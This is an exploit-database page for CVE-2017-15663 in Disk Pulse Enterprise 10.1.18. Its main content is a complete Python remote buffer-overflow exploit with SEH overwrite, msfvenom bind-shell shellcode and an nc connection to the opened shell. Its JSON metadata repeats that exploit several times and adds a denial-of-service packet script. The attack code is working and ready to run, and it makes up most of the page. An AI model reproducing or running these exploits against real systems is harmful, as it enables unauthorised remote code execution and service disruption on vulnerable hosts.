Search...

Disk Pulse Enterprise 10.1.18 - Buffer Overflow

2018-01-15T00:00:00

ID EDB-ID:43589
Type exploitdb
Reporter Exploit-DB
Modified 2018-01-15T00:00:00

Description

Disk Pulse Enterprise 10.1.18 - Buffer Overflow. CVE-2017-15663. Remote exploit for Windows platform

                                        
                                            # Exploit Title: Disk Pulse Enterprise Server v10.1.18 - Buffer Overflow
# Exploit Author: Ahmad Mahfouz 
# Description: Disk Pule Enterprise Server Unauthenticated Remote Buffer Overflow SEH
# Contact: http://twitter.com/eln1x
# Date: 12/01/2018
# CVE: CVE-2017-15663
# Version: v10.1.18 
# Tested on: Windows 7 x64
# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v10.1.18.exe

 

from struct import pack
from os import system
from sys import exit
from time import sleep
import socket

 

port = 9120
host = '192.168.72.231'


stage1 = "\x83\xc4\x7f" *17 # metasm &gt; add esp,127
stage1 += "\x83\xc4\x04"    # metasm &gt; add esp,4
stage1 +=  "\xff\xe4"       # metasm &gt; jmp esp
# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=1337 -f py -b '\x02'

buf =  "\x90" * 10 
buf += "\xb8\x01\x69\xed\x6f\xdd\xc3\xd9\x74\x24\xf4\x5a\x31"
buf += "\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\x43\x67\x0f"
buf += "\x9a\xbf\x9f\x4d\x65\x3f\x60\x32\xef\xda\x51\x72\x8b"
buf += "\xaf\xc2\x42\xdf\xfd\xee\x29\x8d\x15\x64\x5f\x1a\x1a"
buf += "\xcd\xea\x7c\x15\xce\x47\xbc\x34\x4c\x9a\x91\x96\x6d"
buf += "\x55\xe4\xd7\xaa\x88\x05\x85\x63\xc6\xb8\x39\x07\x92"
buf += "\x00\xb2\x5b\x32\x01\x27\x2b\x35\x20\xf6\x27\x6c\xe2"
buf += "\xf9\xe4\x04\xab\xe1\xe9\x21\x65\x9a\xda\xde\x74\x4a"
buf += "\x13\x1e\xda\xb3\x9b\xed\x22\xf4\x1c\x0e\x51\x0c\x5f"
buf += "\xb3\x62\xcb\x1d\x6f\xe6\xcf\x86\xe4\x50\x2b\x36\x28"
buf += "\x06\xb8\x34\x85\x4c\xe6\x58\x18\x80\x9d\x65\x91\x27"
buf += "\x71\xec\xe1\x03\x55\xb4\xb2\x2a\xcc\x10\x14\x52\x0e"
buf += "\xfb\xc9\xf6\x45\x16\x1d\x8b\x04\x7f\xd2\xa6\xb6\x7f"
buf += "\x7c\xb0\xc5\x4d\x23\x6a\x41\xfe\xac\xb4\x96\x01\x87"
buf += "\x01\x08\xfc\x28\x72\x01\x3b\x7c\x22\x39\xea\xfd\xa9"
buf += "\xb9\x13\x28\x47\xb1\xb2\x83\x7a\x3c\x04\x74\x3b\xee"
buf += "\xed\x9e\xb4\xd1\x0e\xa1\x1e\x7a\xa6\x5c\xa1\x81\x0e"
buf += "\xe8\x47\xe3\x60\xbc\xd0\x9b\x42\x9b\xe8\x3c\xbc\xc9"
buf += "\x40\xaa\xf5\x1b\x56\xd5\x05\x0e\xf0\x41\x8e\x5d\xc4"
buf += "\x70\x91\x4b\x6c\xe5\x06\x01\xfd\x44\xb6\x16\xd4\x3e"
buf += "\x5b\x84\xb3\xbe\x12\xb5\x6b\xe9\x73\x0b\x62\x7f\x6e"
buf += "\x32\xdc\x9d\x73\xa2\x27\x25\xa8\x17\xa9\xa4\x3d\x23"
buf += "\x8d\xb6\xfb\xac\x89\xe2\x53\xfb\x47\x5c\x12\x55\x26"
buf += "\x36\xcc\x0a\xe0\xde\x89\x60\x33\x98\x95\xac\xc5\x44"
buf += "\x27\x19\x90\x7b\x88\xcd\x14\x04\xf4\x6d\xda\xdf\xbc"
buf += "\x9e\x91\x7d\x94\x36\x7c\x14\xa4\x5a\x7f\xc3\xeb\x62"
buf += "\xfc\xe1\x93\x90\x1c\x80\x96\xdd\x9a\x79\xeb\x4e\x4f"
buf += "\x7d\x58\x6e\x5a"

shellcode = buf
payload = 'A' * 124             #offset
payload +=  '\xeb\x09\x90\x90'  #jmp over seh retrun value
payload +=  '\xcd\x89\x06\x10' #0x100689cd : pop ebp # pop ebx # ret 0x04 |  {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\Disk Pulse Enterprise\bin\libspp.dll)
payload += stage1 
payload +=  '\x90' * (1000 - len(payload) - len(shellcode))
payload += shellcode 

 

header = '\x75\x19\xba\xab'
header += '\x03\x00\x00\x00'
header += '\x00\x40\x00\x00'
header += pack('&lt;I', len(payload))
header += pack('&lt;I', len(payload))
header += pack('&lt;I', ord(payload[-1]))
packet = header
packet += payload 

 

 

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:

    print "[*] Testing connection to tatget %s:%s" %(host,port)
    s.connect((host, port))

except:

    print "[-] Unable to communicate to target %s:%s" %(host,port)

    exit()

 

s.send(packet)

print "[*] Payload Sent.."
print "[*] Connecting to bind shell %s:1337 .." %host
sleep(3)
system("nc %s 1337"%host)

JSON Vulners Source

Initial Source

{"id": "EDB-ID:43589", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Disk Pulse Enterprise 10.1.18 - Buffer Overflow", "description": "Disk Pulse Enterprise 10.1.18 - Buffer Overflow. CVE-2017-15663. Remote exploit for Windows platform", "published": "2018-01-15T00:00:00", "modified": "2018-01-15T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/43589/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2017-15663"], "lastseen": "2018-01-24T14:21:59", "viewCount": 5, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2018-01-24T14:21:59", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-15663"]}, {"type": "exploitdb", "idList": ["EDB-ID:43452"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145763", "PACKETSTORM:145901"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:BDDF2149B6E579033DBF5F7F9437164D", "EXPLOITPACK:707D979D9B3271E0FBF5BF6A1315ACED"]}, {"type": "zdt", "idList": ["1337DAY-ID-29400"]}], "modified": "2018-01-24T14:21:59", "rev": 2}, "vulnersScore": 6.4}, "sourceHref": "https://www.exploit-db.com/download/43589/", "sourceData": "# Exploit Title: Disk Pulse Enterprise Server v10.1.18 - Buffer Overflow\r\n# Exploit Author: Ahmad Mahfouz \r\n# Description: Disk Pule Enterprise Server Unauthenticated Remote Buffer Overflow SEH\r\n# Contact: http://twitter.com/eln1x\r\n# Date: 12/01/2018\r\n# CVE: CVE-2017-15663\r\n# Version: v10.1.18 \r\n# Tested on: Windows 7 x64\r\n# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v10.1.18.exe\r\n\r\n \r\n\r\nfrom struct import pack\r\nfrom os import system\r\nfrom sys import exit\r\nfrom time import sleep\r\nimport socket\r\n\r\n \r\n\r\nport = 9120\r\nhost = '192.168.72.231'\r\n\r\n\r\nstage1 = \"\\x83\\xc4\\x7f\" *17 # metasm > add esp,127\r\nstage1 += \"\\x83\\xc4\\x04\"\u00a0\u00a0\u00a0 # metasm > add esp,4\r\nstage1 +=\u00a0 \"\\xff\\xe4\"\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # metasm > jmp esp\r\n# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=1337 -f py -b '\\x02'\r\n\r\nbuf =\u00a0 \"\\x90\" * 10 \r\nbuf += \"\\xb8\\x01\\x69\\xed\\x6f\\xdd\\xc3\\xd9\\x74\\x24\\xf4\\x5a\\x31\"\r\nbuf += \"\\xc9\\xb1\\x53\\x31\\x42\\x12\\x83\\xea\\xfc\\x03\\x43\\x67\\x0f\"\r\nbuf += \"\\x9a\\xbf\\x9f\\x4d\\x65\\x3f\\x60\\x32\\xef\\xda\\x51\\x72\\x8b\"\r\nbuf += \"\\xaf\\xc2\\x42\\xdf\\xfd\\xee\\x29\\x8d\\x15\\x64\\x5f\\x1a\\x1a\"\r\nbuf += \"\\xcd\\xea\\x7c\\x15\\xce\\x47\\xbc\\x34\\x4c\\x9a\\x91\\x96\\x6d\"\r\nbuf += \"\\x55\\xe4\\xd7\\xaa\\x88\\x05\\x85\\x63\\xc6\\xb8\\x39\\x07\\x92\"\r\nbuf += \"\\x00\\xb2\\x5b\\x32\\x01\\x27\\x2b\\x35\\x20\\xf6\\x27\\x6c\\xe2\"\r\nbuf += \"\\xf9\\xe4\\x04\\xab\\xe1\\xe9\\x21\\x65\\x9a\\xda\\xde\\x74\\x4a\"\r\nbuf += \"\\x13\\x1e\\xda\\xb3\\x9b\\xed\\x22\\xf4\\x1c\\x0e\\x51\\x0c\\x5f\"\r\nbuf += \"\\xb3\\x62\\xcb\\x1d\\x6f\\xe6\\xcf\\x86\\xe4\\x50\\x2b\\x36\\x28\"\r\nbuf += \"\\x06\\xb8\\x34\\x85\\x4c\\xe6\\x58\\x18\\x80\\x9d\\x65\\x91\\x27\"\r\nbuf += \"\\x71\\xec\\xe1\\x03\\x55\\xb4\\xb2\\x2a\\xcc\\x10\\x14\\x52\\x0e\"\r\nbuf += \"\\xfb\\xc9\\xf6\\x45\\x16\\x1d\\x8b\\x04\\x7f\\xd2\\xa6\\xb6\\x7f\"\r\nbuf += \"\\x7c\\xb0\\xc5\\x4d\\x23\\x6a\\x41\\xfe\\xac\\xb4\\x96\\x01\\x87\"\r\nbuf += \"\\x01\\x08\\xfc\\x28\\x72\\x01\\x3b\\x7c\\x22\\x39\\xea\\xfd\\xa9\"\r\nbuf += \"\\xb9\\x13\\x28\\x47\\xb1\\xb2\\x83\\x7a\\x3c\\x04\\x74\\x3b\\xee\"\r\nbuf += \"\\xed\\x9e\\xb4\\xd1\\x0e\\xa1\\x1e\\x7a\\xa6\\x5c\\xa1\\x81\\x0e\"\r\nbuf += \"\\xe8\\x47\\xe3\\x60\\xbc\\xd0\\x9b\\x42\\x9b\\xe8\\x3c\\xbc\\xc9\"\r\nbuf += \"\\x40\\xaa\\xf5\\x1b\\x56\\xd5\\x05\\x0e\\xf0\\x41\\x8e\\x5d\\xc4\"\r\nbuf += \"\\x70\\x91\\x4b\\x6c\\xe5\\x06\\x01\\xfd\\x44\\xb6\\x16\\xd4\\x3e\"\r\nbuf += \"\\x5b\\x84\\xb3\\xbe\\x12\\xb5\\x6b\\xe9\\x73\\x0b\\x62\\x7f\\x6e\"\r\nbuf += \"\\x32\\xdc\\x9d\\x73\\xa2\\x27\\x25\\xa8\\x17\\xa9\\xa4\\x3d\\x23\"\r\nbuf += \"\\x8d\\xb6\\xfb\\xac\\x89\\xe2\\x53\\xfb\\x47\\x5c\\x12\\x55\\x26\"\r\nbuf += \"\\x36\\xcc\\x0a\\xe0\\xde\\x89\\x60\\x33\\x98\\x95\\xac\\xc5\\x44\"\r\nbuf += \"\\x27\\x19\\x90\\x7b\\x88\\xcd\\x14\\x04\\xf4\\x6d\\xda\\xdf\\xbc\"\r\nbuf += \"\\x9e\\x91\\x7d\\x94\\x36\\x7c\\x14\\xa4\\x5a\\x7f\\xc3\\xeb\\x62\"\r\nbuf += \"\\xfc\\xe1\\x93\\x90\\x1c\\x80\\x96\\xdd\\x9a\\x79\\xeb\\x4e\\x4f\"\r\nbuf += \"\\x7d\\x58\\x6e\\x5a\"\r\n\r\nshellcode = buf\r\npayload = 'A' * 124\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 #offset\r\npayload +=\u00a0 '\\xeb\\x09\\x90\\x90'\u00a0 #jmp over seh retrun value\r\npayload +=\u00a0 '\\xcd\\x89\\x06\\x10' #0x100689cd : pop ebp # pop ebx # ret 0x04 |\u00a0 {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\\Program Files (x86)\\Disk Pulse Enterprise\\bin\\libspp.dll)\r\npayload += stage1 \r\npayload +=\u00a0 '\\x90' * (1000 - len(payload) - len(shellcode))\r\npayload += shellcode \r\n\r\n \r\n\r\nheader = '\\x75\\x19\\xba\\xab'\r\nheader += '\\x03\\x00\\x00\\x00'\r\nheader += '\\x00\\x40\\x00\\x00'\r\nheader += pack('<I', len(payload))\r\nheader += pack('<I', len(payload))\r\nheader += pack('<I', ord(payload[-1]))\r\npacket = header\r\npacket += payload \r\n\r\n \r\n\r\n \r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\ntry:\r\n\r\n\u00a0\u00a0\u00a0 print \"[*] Testing connection to tatget %s:%s\" %(host,port)\r\n\u00a0\u00a0\u00a0 s.connect((host, port))\r\n\r\nexcept:\r\n\r\n\u00a0\u00a0\u00a0 print \"[-] Unable to communicate to target %s:%s\" %(host,port)\r\n\r\n\u00a0\u00a0\u00a0 exit()\r\n\r\n \r\n\r\ns.send(packet)\r\n\r\nprint \"[*] Payload Sent..\"\r\nprint \"[*] Connecting to bind shell %s:1337 ..\" %host\r\nsleep(3)\r\nsystem(\"nc %s 1337\"%host)", "osvdbidlist": []}

{"cve": [{"lastseen": "2021-02-02T06:36:38", "description": "In Flexense Disk Pulse Enterprise v10.1.18, the Control Protocol suffers from a denial of service vulnerability. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9120.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-01-10T18:29:00", "title": "CVE-2017-15663", "type": "cve", "cwe": ["CWE-358"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-15663"], "modified": "2018-02-01T19:39:00", "cpe": ["cpe:/a:flexense:disk_pulse:10.1.18"], "id": "CVE-2017-15663", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-15663", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:flexense:disk_pulse:10.1.18:*:*:*:enterprise:*:*:*"]}], "exploitdb": [{"lastseen": "2018-01-24T14:18:24", "description": "Disk Pulse Enterprise 10.1.18 - Denial of Service. CVE-2017-15663. Dos exploit for Windows platform", "published": "2018-01-08T00:00:00", "type": "exploitdb", "title": "Disk Pulse Enterprise 10.1.18 - Denial of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-15663"], "modified": "2018-01-08T00:00:00", "id": "EDB-ID:43452", "href": "https://www.exploit-db.com/exploits/43452/", "sourceData": "# Exploit Title: Disk Pulse Enterprise Server v10.1.18 - DOS,\r\n# Date: 2017-10-20\r\n# Exploit Author: Ahmad Mahfouz\r\n# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v10.1.18.exe\r\n# Version: v10.1.18\r\n# Category; Windows Remote DOS\r\n# CVE: CVE-2017-15663\r\n# Author Twitter: @eln1x\r\n# Description In Disk Pulse Enterprise Server v10.1.18, the Control Protocol suffers from a denial of service. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9120.\r\n\r\n \r\n\r\n \r\n\r\nimport socket\r\ntarget = \"192.168.72.231\"\r\nport = 9120\r\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\ns.connect((target,port))\r\n\r\npacket = \"\\x75\\x19\\xba\\xab\\x03\"\r\npacket +=\"\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x1a\"\r\npacket += \"\\x00\"\r\npacket += \"\\x3e\" #evil\r\npacket += \"\\x00\"\r\npacket += \"\\x20\"\r\npacket += \"\\x00\"\r\npacket += \"\\x00\"\r\npacket += \"\\x00\"\r\npacket += \"\\x00\\x00\\x00\\x00\"\r\npacket += \"SERVER_GET_INFO\"\r\npacket += \"\\x02\\x32\\x01\"\r\npacket += \"Data\"\r\npacket += \"\\x01\\x30\\x01\\x00\"\r\npacket += \"\\x04\\x02\\x74\"\r\npacket += \"\\x18\\x18\\x00\"\r\n\r\ns.send(packet)\r\n\r\ntry:\r\n\r\n data = s.recv(100)\r\n print data\r\n\r\nexcept:\r\n\r\n print \"K1LL3D\"", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43452/"}], "packetstorm": [{"lastseen": "2018-01-10T01:26:45", "description": "", "published": "2018-01-09T00:00:00", "type": "packetstorm", "title": "Disk Pulse Enterprise 10.1.18 Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-15663"], "modified": "2018-01-09T00:00:00", "id": "PACKETSTORM:145763", "href": "https://packetstormsecurity.com/files/145763/Disk-Pulse-Enterprise-10.1.18-Denial-Of-Service.html", "sourceData": "`# Exploit Title: Disk Pulse Enterprise Server v10.1.18 - DOS, \n# Date: 2017-10-20 \n# Exploit Author: Ahmad Mahfouz \n# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v10.1.18.exe \n# Version: v10.1.18 \n# Category; Windows Remote DOS \n# CVE: CVE-2017-15663 \n# Author Twitter: @eln1x \n# Description In Disk Pulse Enterprise Server v10.1.18, the Control Protocol suffers from a denial of service. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9120. \n \n \n \n \n \nimport socket \ntarget = \"192.168.72.231\" \nport = 9120 \ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM) \ns.connect((target,port)) \n \npacket = \"\\x75\\x19\\xba\\xab\\x03\" \npacket +=\"\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x1a\" \npacket += \"\\x00\" \npacket += \"\\x3e\" #evil \npacket += \"\\x00\" \npacket += \"\\x20\" \npacket += \"\\x00\" \npacket += \"\\x00\" \npacket += \"\\x00\" \npacket += \"\\x00\\x00\\x00\\x00\" \npacket += \"SERVER_GET_INFO\" \npacket += \"\\x02\\x32\\x01\" \npacket += \"Data\" \npacket += \"\\x01\\x30\\x01\\x00\" \npacket += \"\\x04\\x02\\x74\" \npacket += \"\\x18\\x18\\x00\" \n \ns.send(packet) \n \ntry: \n \ndata = s.recv(100) \nprint data \n \nexcept: \n \nprint \"K1LL3D\" \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/145763/diskpulseent10118-dos.txt"}, {"lastseen": "2018-01-16T00:22:40", "description": "", "published": "2018-01-15T00:00:00", "type": "packetstorm", "title": "Disk Pulse Enterprise 10.1.18 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-15663"], "modified": "2018-01-15T00:00:00", "id": "PACKETSTORM:145901", "href": "https://packetstormsecurity.com/files/145901/Disk-Pulse-Enterprise-10.1.18-Buffer-Overflow.html", "sourceData": "`# Exploit Title: Disk Pulse Enterprise Server v10.1.18 - Buffer Overflow \n# Exploit Author: Ahmad Mahfouz \n# Description: Disk Pule Enterprise Server Unauthenticated Remote Buffer Overflow SEH \n# Contact: http://twitter.com/eln1x \n# Date: 12/01/2018 \n# CVE: CVE-2017-15663 \n# Version: v10.1.18 \n# Tested on: Windows 7 x64 \n# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v10.1.18.exe \n \n \n \nfrom struct import pack \nfrom os import system \nfrom sys import exit \nfrom time import sleep \nimport socket \n \n \n \nport = 9120 \nhost = '192.168.72.231' \n \n \nstage1 = \"\\x83\\xc4\\x7f\" *17 # metasm > add esp,127 \nstage1 += \"\\x83\\xc4\\x04\" # metasm > add esp,4 \nstage1 += \"\\xff\\xe4\" # metasm > jmp esp \n# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=1337 -f py -b '\\x02' \n \nbuf = \"\\x90\" * 10 \nbuf += \"\\xb8\\x01\\x69\\xed\\x6f\\xdd\\xc3\\xd9\\x74\\x24\\xf4\\x5a\\x31\" \nbuf += \"\\xc9\\xb1\\x53\\x31\\x42\\x12\\x83\\xea\\xfc\\x03\\x43\\x67\\x0f\" \nbuf += \"\\x9a\\xbf\\x9f\\x4d\\x65\\x3f\\x60\\x32\\xef\\xda\\x51\\x72\\x8b\" \nbuf += \"\\xaf\\xc2\\x42\\xdf\\xfd\\xee\\x29\\x8d\\x15\\x64\\x5f\\x1a\\x1a\" \nbuf += \"\\xcd\\xea\\x7c\\x15\\xce\\x47\\xbc\\x34\\x4c\\x9a\\x91\\x96\\x6d\" \nbuf += \"\\x55\\xe4\\xd7\\xaa\\x88\\x05\\x85\\x63\\xc6\\xb8\\x39\\x07\\x92\" \nbuf += \"\\x00\\xb2\\x5b\\x32\\x01\\x27\\x2b\\x35\\x20\\xf6\\x27\\x6c\\xe2\" \nbuf += \"\\xf9\\xe4\\x04\\xab\\xe1\\xe9\\x21\\x65\\x9a\\xda\\xde\\x74\\x4a\" \nbuf += \"\\x13\\x1e\\xda\\xb3\\x9b\\xed\\x22\\xf4\\x1c\\x0e\\x51\\x0c\\x5f\" \nbuf += \"\\xb3\\x62\\xcb\\x1d\\x6f\\xe6\\xcf\\x86\\xe4\\x50\\x2b\\x36\\x28\" \nbuf += \"\\x06\\xb8\\x34\\x85\\x4c\\xe6\\x58\\x18\\x80\\x9d\\x65\\x91\\x27\" \nbuf += \"\\x71\\xec\\xe1\\x03\\x55\\xb4\\xb2\\x2a\\xcc\\x10\\x14\\x52\\x0e\" \nbuf += \"\\xfb\\xc9\\xf6\\x45\\x16\\x1d\\x8b\\x04\\x7f\\xd2\\xa6\\xb6\\x7f\" \nbuf += \"\\x7c\\xb0\\xc5\\x4d\\x23\\x6a\\x41\\xfe\\xac\\xb4\\x96\\x01\\x87\" \nbuf += \"\\x01\\x08\\xfc\\x28\\x72\\x01\\x3b\\x7c\\x22\\x39\\xea\\xfd\\xa9\" \nbuf += \"\\xb9\\x13\\x28\\x47\\xb1\\xb2\\x83\\x7a\\x3c\\x04\\x74\\x3b\\xee\" \nbuf += \"\\xed\\x9e\\xb4\\xd1\\x0e\\xa1\\x1e\\x7a\\xa6\\x5c\\xa1\\x81\\x0e\" \nbuf += \"\\xe8\\x47\\xe3\\x60\\xbc\\xd0\\x9b\\x42\\x9b\\xe8\\x3c\\xbc\\xc9\" \nbuf += \"\\x40\\xaa\\xf5\\x1b\\x56\\xd5\\x05\\x0e\\xf0\\x41\\x8e\\x5d\\xc4\" \nbuf += \"\\x70\\x91\\x4b\\x6c\\xe5\\x06\\x01\\xfd\\x44\\xb6\\x16\\xd4\\x3e\" \nbuf += \"\\x5b\\x84\\xb3\\xbe\\x12\\xb5\\x6b\\xe9\\x73\\x0b\\x62\\x7f\\x6e\" \nbuf += \"\\x32\\xdc\\x9d\\x73\\xa2\\x27\\x25\\xa8\\x17\\xa9\\xa4\\x3d\\x23\" \nbuf += \"\\x8d\\xb6\\xfb\\xac\\x89\\xe2\\x53\\xfb\\x47\\x5c\\x12\\x55\\x26\" \nbuf += \"\\x36\\xcc\\x0a\\xe0\\xde\\x89\\x60\\x33\\x98\\x95\\xac\\xc5\\x44\" \nbuf += \"\\x27\\x19\\x90\\x7b\\x88\\xcd\\x14\\x04\\xf4\\x6d\\xda\\xdf\\xbc\" \nbuf += \"\\x9e\\x91\\x7d\\x94\\x36\\x7c\\x14\\xa4\\x5a\\x7f\\xc3\\xeb\\x62\" \nbuf += \"\\xfc\\xe1\\x93\\x90\\x1c\\x80\\x96\\xdd\\x9a\\x79\\xeb\\x4e\\x4f\" \nbuf += \"\\x7d\\x58\\x6e\\x5a\" \n \nshellcode = buf \npayload = 'A' * 124 #offset \npayload += '\\xeb\\x09\\x90\\x90' #jmp over seh retrun value \npayload += '\\xcd\\x89\\x06\\x10' #0x100689cd : pop ebp # pop ebx # ret 0x04 | {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\\Program Files (x86)\\Disk Pulse Enterprise\\bin\\libspp.dll) \npayload += stage1 \npayload += '\\x90' * (1000 - len(payload) - len(shellcode)) \npayload += shellcode \n \n \n \nheader = '\\x75\\x19\\xba\\xab' \nheader += '\\x03\\x00\\x00\\x00' \nheader += '\\x00\\x40\\x00\\x00' \nheader += pack('<I', len(payload)) \nheader += pack('<I', len(payload)) \nheader += pack('<I', ord(payload[-1])) \npacket = header \npacket += payload \n \n \n \n \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n \ntry: \n \nprint \"[*] Testing connection to tatget %s:%s\" %(host,port) \ns.connect((host, port)) \n \nexcept: \n \nprint \"[-] Unable to communicate to target %s:%s\" %(host,port) \n \nexit() \n \n \n \ns.send(packet) \n \nprint \"[*] Payload Sent..\" \nprint \"[*] Connecting to bind shell %s:1337 ..\" %host \nsleep(3) \nsystem(\"nc %s 1337\"%host) \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/145901/dpe10118-overflow.txt"}], "zdt": [{"lastseen": "2018-03-03T03:34:40", "description": "Exploit for windows platform in category remote exploits", "edition": 1, "published": "2018-01-08T00:00:00", "title": "Disk Pulse Enterprise 10.1.18 - Denial of Service Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-15663"], "modified": "2018-01-08T00:00:00", "href": "https://0day.today/exploit/description/29400", "id": "1337DAY-ID-29400", "sourceData": "# Exploit Title: Disk Pulse Enterprise Server v10.1.18 - DOS,\r\n# Date: 2017-10-20\r\n# Exploit Author: Ahmad Mahfouz\r\n# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v10.1.18.exe\r\n# Version: v10.1.18\r\n# Category; Windows Remote DOS\r\n# CVE: CVE-2017-15663\r\n# Author Twitter: @eln1x\r\n# Description In Disk Pulse Enterprise Server v10.1.18, the Control Protocol suffers from a denial of service. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9120.\r\n \r\n \r\n \r\n \r\n \r\nimport socket\r\ntarget = \"192.168.72.231\"\r\nport = 9120\r\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\ns.connect((target,port))\r\n \r\npacket = \"\\x75\\x19\\xba\\xab\\x03\"\r\npacket +=\"\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x1a\"\r\npacket += \"\\x00\"\r\npacket += \"\\x3e\" #evil\r\npacket += \"\\x00\"\r\npacket += \"\\x20\"\r\npacket += \"\\x00\"\r\npacket += \"\\x00\"\r\npacket += \"\\x00\"\r\npacket += \"\\x00\\x00\\x00\\x00\"\r\npacket += \"SERVER_GET_INFO\"\r\npacket += \"\\x02\\x32\\x01\"\r\npacket += \"Data\"\r\npacket += \"\\x01\\x30\\x01\\x00\"\r\npacket += \"\\x04\\x02\\x74\"\r\npacket += \"\\x18\\x18\\x00\"\r\n \r\ns.send(packet)\r\n \r\ntry:\r\n \r\n data = s.recv(100)\r\n print data\r\n \r\nexcept:\r\n \r\n print \"K1LL3D\"\n\n# 0day.today [2018-03-03] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/29400"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:12", "description": "\nDisk Pulse Enterprise 10.1.18 - Denial of Service", "edition": 1, "published": "2018-01-08T00:00:00", "title": "Disk Pulse Enterprise 10.1.18 - Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-15663"], "modified": "2018-01-08T00:00:00", "id": "EXPLOITPACK:707D979D9B3271E0FBF5BF6A1315ACED", "href": "", "sourceData": "# Exploit Title: Disk Pulse Enterprise Server v10.1.18 - DOS,\n# Date: 2017-10-20\n# Exploit Author: Ahmad Mahfouz\n# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v10.1.18.exe\n# Version: v10.1.18\n# Category; Windows Remote DOS\n# CVE: CVE-2017-15663\n# Author Twitter: @eln1x\n# Description In Disk Pulse Enterprise Server v10.1.18, the Control Protocol suffers from a denial of service. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9120.\n\n \n\n \n\nimport socket\ntarget = \"192.168.72.231\"\nport = 9120\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect((target,port))\n\npacket = \"\\x75\\x19\\xba\\xab\\x03\"\npacket +=\"\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x1a\"\npacket += \"\\x00\"\npacket += \"\\x3e\" #evil\npacket += \"\\x00\"\npacket += \"\\x20\"\npacket += \"\\x00\"\npacket += \"\\x00\"\npacket += \"\\x00\"\npacket += \"\\x00\\x00\\x00\\x00\"\npacket += \"SERVER_GET_INFO\"\npacket += \"\\x02\\x32\\x01\"\npacket += \"Data\"\npacket += \"\\x01\\x30\\x01\\x00\"\npacket += \"\\x04\\x02\\x74\"\npacket += \"\\x18\\x18\\x00\"\n\ns.send(packet)\n\ntry:\n\n data = s.recv(100)\n print data\n\nexcept:\n\n print \"K1LL3D\"", "cvss": {"score": 5.0, "vector": 